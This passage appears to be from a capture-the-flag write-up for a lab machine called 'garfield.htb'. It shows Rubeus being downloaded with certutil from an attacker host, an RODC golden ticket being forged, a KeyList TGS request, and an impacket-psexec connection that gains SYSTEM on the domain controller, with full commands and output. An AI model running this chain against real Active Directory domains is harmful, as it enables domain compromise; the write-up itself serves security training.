$ evil-winrm -i garfield.htb -u l.wilson_adm -p Password123

*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> certutil -urlcache -split -f http://10.10.16.27/Rubeus.exe
**** Online ****
000000 ...
043e00
CertUtil: -URLCache command completed successfully.
*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> .\Rubeus.exe golden /rodcNumber:8245 /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 /user:Administrator /id:500 `
/domain:garfield.htb /sid:S-1-5-21-2502726253-3859040611-225969357

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.3.2

[*] Action: Build TGT

[*] Building PAC

[*] Domain : GARFIELD.HTB (GARFIELD)
[*] SID : S-1-5-21-2502726253-3859040611-225969357
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : D6C93CBE006372ADB8403630F9E86594F52C8105A52F9B21FEF62E9C7A75E240
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : D6C93CBE006372ADB8403630F9E86594F52C8105A52F9B21FEF62E9C7A75E240
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : garfield.htb

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@garfield.htb'

[*] AuthTime : 4/10/2026 5:47:46 PM
[*] StartTime : 4/10/2026 5:47:46 PM
[*] EndTime : 4/11/2026 3:47:46 AM
[*] RenewTill : 4/17/2026 5:47:46 PM

[*] base64(ticket.kirbi):

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


[*] Ticket written to ticket_2026_04_11_00_47_46_Administrator_to_krbtgt@GARFIELD.HTB.kirbi

The golden ticket is signed with krbtgt_8245 but needs to be validated by the DC. Use Rubeus asktgs with /keyList to request a real TGS from DC01 — this is the RODC KeyList attack, where DC01 validates the RODC-signed ticket and issues a proper service ticket:

*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> .\Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/garfield.htb /dc:DC01.garfield.htb /ticket:ticket_2026_04_11_00_47_46_Administrator_to_krbtgt@GARFIELD.HTB.kirbi /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.3.2

[*] Action: Ask TGS

[*] Requesting 'aes256_cts_hmac_sha1' etype for the service ticket
[*] Building KeyList TGS-REQ request for: 'Administrator'
[*] Using domain controller: DC01.garfield.htb (fe80::dd9d:e3db:1f74:a946%7)
[+] TGS request successful!
[*] base64(ticket.kirbi):

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

ServiceName : krbtgt/GARFIELD.HTB
ServiceRealm : GARFIELD.HTB
UserName : Administrator (NT_PRINCIPAL)
UserRealm : GARFIELD.HTB
StartTime : 4/10/2026 5:48:08 PM
EndTime : 4/11/2026 3:47:46 AM
RenewTill : 1/1/0001 12:00:00 AM
Flags : name_canonicalize
KeyType : aes256_cts_hmac_sha1
Base64(key) : Y3FrtLcr9X6o+HJyua1vug923letL4hFAXS+pFjOoHw=
Password Hash : EE238F6DEBC752010428F20875B092D5

Back on the attack machine, decode the base64 ticket and convert it to ccache format:

$ echo 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 | base64 -d > ticket.kirbi
$ impacket-ticketConverter ticket.kirbi ticket.ccache                              
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] converting kirbi to ccache...
[+] done

Root Flag

Export the ticket and connect to DC01 as Administrator:

$ export KRB5CCNAME=$(pwd)/ticket.ccache

$ impacket-psexec garfield.htb/Administrator@DC01.garfield.htb -k -no-pass
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on DC01.garfield.htb.....
[*] Found writable share ADMIN$
[*] Uploading file cSccdTlS.exe
[*] Opening SVCManager on DC01.garfield.htb.....
[*] Creating service BEyZ on DC01.garfield.htb.....
[*] Starting service BEyZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.8385]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>